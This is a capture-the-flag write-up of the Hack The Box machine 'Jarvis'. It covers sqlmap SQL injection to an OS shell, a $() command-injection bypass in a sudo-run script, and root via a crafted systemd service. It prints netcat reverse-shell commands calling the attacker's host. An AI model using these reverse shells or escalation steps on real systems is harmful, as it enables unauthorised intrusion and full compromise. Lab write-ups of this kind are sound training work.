hello fellow hackers, today I’m going to solve Jarvis from hack the box
so lets get started!!!
I started with nmap to discover the open ports on the machine
nmap -A -sT -v 10.10.10.143
so the box has two ports open in it
1- ssh running on port 22
2- Apache web server running on 80
let’s checkout port 80 !!!
Its a hotel web site “stark hotel” , after goofing around in the website I found /room.php page to rent rooms and its getting rooms from the database so I decided to test it for sql injection using sqlmap
sqlmap -u https://10.10.10.143/room.php?cod=5 --level=5 --risk=3
and yes!!!, cod parameter is vulnerable to sql injection, so I tried to pop out a shell using sqlmap option –os-shell
and boom!!! we are in as www-data user , so to get much more stable shell I got a reverse shell from sqlmap using nc
after getting the shell I tried to read the user flag but I have no privilege, so I need to escalate my privilege
after some enumeration I found that user www-data can use command sudo to execute simpler.py as pepper user
after running the script , it has an option to execute ping command so I tried to inject commands in it but all characters that can be used to inject commands are forbidding , after some google search i found an article talking about encapsulating the commands using $() so I tried it and it worked !!!
now we need to get a shell as pepper using this technique, so I wrote a nc command and save it into a bash file
#bin/bash nc -nv 10.10.14.104 1995 -e /bin/bash
then I sat up my listener to listen on port 1995 after that I called the file inside the script and i have a shell as pepper and I can read the user flag!!!
now for the root part , after some enumeration I really had nothing but I noticed something weird , i can run systemctl that is controlling interface and inspection tool for services ,when i ran systemctl it only warning me that i have no permission , it seems to work fine for me
so after some google search I found a way to exploit it
first we have to create a service and configure it to run our script that has the code for a reverse shell then we need to create the file that we want to execute
lets call our service X
[Unit] Description=X [Service] ExecStart=/bin/bash /home/pepper/shell.sh [Install] WantedBy=multi-user.target
#bin/bash nc -nv 10.10.14.104 1997 -e /bin/bash
now lets set our listener and run the service
systemctl enable /home/pepper/x.service --now
and let there be root!!!
SMT Red Team